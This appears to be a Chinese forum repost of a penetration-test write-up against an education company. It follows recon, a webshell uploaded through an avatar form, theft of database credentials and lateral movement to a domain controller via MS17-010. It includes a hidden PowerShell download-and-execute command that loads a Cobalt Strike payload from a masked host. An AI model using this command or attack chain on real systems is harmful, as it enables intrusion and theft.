admin 发表于 2024-3-1 19:41:32

渗透实战 | 从外网直接打到内网全过程

<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">这次渗透是一个从<span lang="EN-US">0</span>到<span lang="EN-US">1</span>,从外网到拿下域控的实战过程,希望可以给大家一些思路</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;">&nbsp;</span>
</p>
<p align="left" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
        <b><span style="font-family:宋体;font-size:13.5pt;">正文</span></b><span lang="EN-US" style="font-family:宋体;font-size:12.0pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;">&nbsp;</span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">目标:<span lang="EN-US">www.xxxx.com(</span>一家教育机构<span lang="EN-US">)<br />
</span>打开是一个登录框,只能是手机号<span lang="EN-US">+</span>密码或者手机号<span lang="EN-US">+</span>验证码且并未开放注册功能</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:left;text-justify:inter-ideograph;">
        <img width="746" height="351" src="http://cobjon.com/w/php/upload/202403/01/8f4a1f85.jpg" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">进行了简单的信息搜集<span lang="EN-US"><br />
<br />
</span></span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">子域名搜集</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p align="center" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:center;text-justify:inter-ideograph;">
        <img width="747" height="342" src="http://cobjon.com/w/php/upload/202403/01/035d6a59.png" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">fofa</span><span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">找资产<span lang="EN-US"><br />
<br />
</span></span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p align="center" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:center;text-justify:inter-ideograph;">
        <img width="1080" height="628" src="http://cobjon.com/w/php/upload/202403/01/812df480.png" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">一共七个资产。去重之后只有两个。<span lang="EN-US"><br />
<br />
</span></span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">目录探测</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p align="center" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:center;text-justify:inter-ideograph;">
        <img width="1080" height="239" src="http://cobjon.com/w/php/upload/202403/01/a100c996.png" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">我尝试了暴力枚举,看有没有弱口令之类的<span lang="EN-US">,</span>然而并没有<span lang="EN-US"><br />
<br />
</span></span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">我又尝试了通过修改返回包来绕过登录界面</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="763" height="277" src="http://cobjon.com/w/php/upload/202403/01/6720807e.png" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">还是不行,尝试注入无果</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="1080" height="156" src="http://cobjon.com/w/php/upload/202403/01/b8fdbe61.png" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">不过我目录探测出了一处<span lang="EN-US">Spring</span>信息泄露<span lang="EN-US"><br />
<br />
</span></span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="756" height="551" src="http://cobjon.com/w/php/upload/202403/01/6f7c5ee1.png" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">尝试<span lang="EN-US">Spring RCE</span>无果,想通过<span lang="EN-US">trace</span>目录下替换<span lang="EN-US">cookie</span>实现登录,但是发现删除了这个目录</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p align="center" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:center;text-justify:inter-ideograph;">
        <img width="1080" height="246" src="http://cobjon.com/w/php/upload/202403/01/64d9eee0.png" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="464" height="849" src="http://cobjon.com/w/php/upload/202403/01/c2fde59c.jpg" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">获取有些师傅到这一步就手机抓包电脑测了。</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">Windows</span><span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">新版微信可以抓取公众号和小程序的包,只需要把<span lang="EN-US">IE</span>代理配置一下即可。</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">其中在一个公众号发现了小程序,可以进行注册。</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">看到了头像上传,尝试上传获取<span lang="EN-US">WebShell</span></span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="461" height="705" src="http://cobjon.com/w/php/upload/202403/01/58a7a93d.jpg" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">未做任何限制成功<span lang="EN-US">GetShell</span>,上了冰蝎马,目录没权限访问</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="1080" height="92" src="http://cobjon.com/w/php/upload/202403/01/45b30ca2.jpg" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">然后上了大马</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:left;text-justify:inter-ideograph;">
        <img width="1023" height="171" src="http://cobjon.com/w/php/upload/202403/01/e328f939.jpg" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:left;text-justify:inter-ideograph;">
        <img width="986" height="434" src="http://cobjon.com/w/php/upload/202403/01/2c5f1e27.jpg" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">通过翻找文件发现数据库账号密码</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:left;text-justify:inter-ideograph;">
        <img width="733" height="610" src="http://cobjon.com/w/php/upload/202403/01/b26c6b59.jpg" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">--</span><span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">内网渗透</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">直接通过<span lang="EN-US">powershell</span>执行<span lang="EN-US"> cs</span>上线</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="1037" height="138" src="http://cobjon.com/w/php/upload/202403/01/39a91148.png" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="931" height="537" src="http://cobjon.com/w/php/upload/202403/01/f40eab05.jpg" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">登录爆破出来的服务器,发现多网卡且存在逻辑隔离。<span lang="EN-US"><br />
<br />
<br />
</span></span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p align="center" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:center;text-justify:inter-ideograph;">
        <img width="737" height="758" src="http://cobjon.com/w/php/upload/202403/01/a2b9b316.png" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">通过跳扳机能通域控,发现域控<span lang="EN-US">server2008</span>且存在<span lang="EN-US">ms17010,</span>直接一把梭<span lang="EN-US"><br />
<br />
</span></span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p align="center" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:18.0pt;text-align:center;text-justify:inter-ideograph;">
        <img width="845" height="418" src="http://cobjon.com/w/php/upload/202403/01/e85bb216.jpg" alt="vshapes=" "="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="color:black;font-family:微软雅黑,sans-serif;font-size:13.5pt;letter-spacing:.4pt;"><br />
<br />
</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;">&nbsp;</span>
</p>
<p align="left" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
        <b><span style="font-family:宋体;font-size:12.0pt;">小结</span></b><span lang="EN-US" style="font-family:宋体;font-size:12.0pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;">&nbsp;</span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span style="color:#595959;font-family:Microsoft YaHei UI,sans-serif;font-size:11.5pt;letter-spacing:1.5pt;">在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!</span><span lang="EN-US" style="color:#222222;font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;"></span>
</p>
<p style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="font-family:Microsoft YaHei UI,sans-serif;font-size:13.0pt;letter-spacing:.4pt;">&nbsp;</span>
</p>
<ul style="margin-top:0cm;" type="disc">
        <li style="font-family:等线;font-size:10.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:right;text-justify:inter-ideograph;">
                <span lang="EN-US" style="font-family:宋体;font-size:12.0pt;">&nbsp;</span>
        </li>
        <li style="font-family:等线;font-size:10.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:right;text-justify:inter-ideograph;">
                <span lang="EN-US" style="font-family:宋体;font-size:12.0pt;">&nbsp;</span>
        </li>
</ul>
<p align="left" style="font-family:等线;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
        <span style="font-family:宋体;">作者:</span><span lang="EN-US" style="font-family:Consolas;">Xm4FDf</span><span style="font-family:宋体;">转载自:</span><span lang="EN-US" style="font-family:Consolas;">https:<i><span style="color:#AFAFAF;">//bbs.ichunqiu.com/thread-57879-1-1.html</span></i></span><span lang="EN-US" style="font-family:宋体;font-size:12.0pt;"></span>
</p>
<p style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US">&nbsp;</span>
</p>
页: [1]
查看完整版本: 渗透实战 | 从外网直接打到内网全过程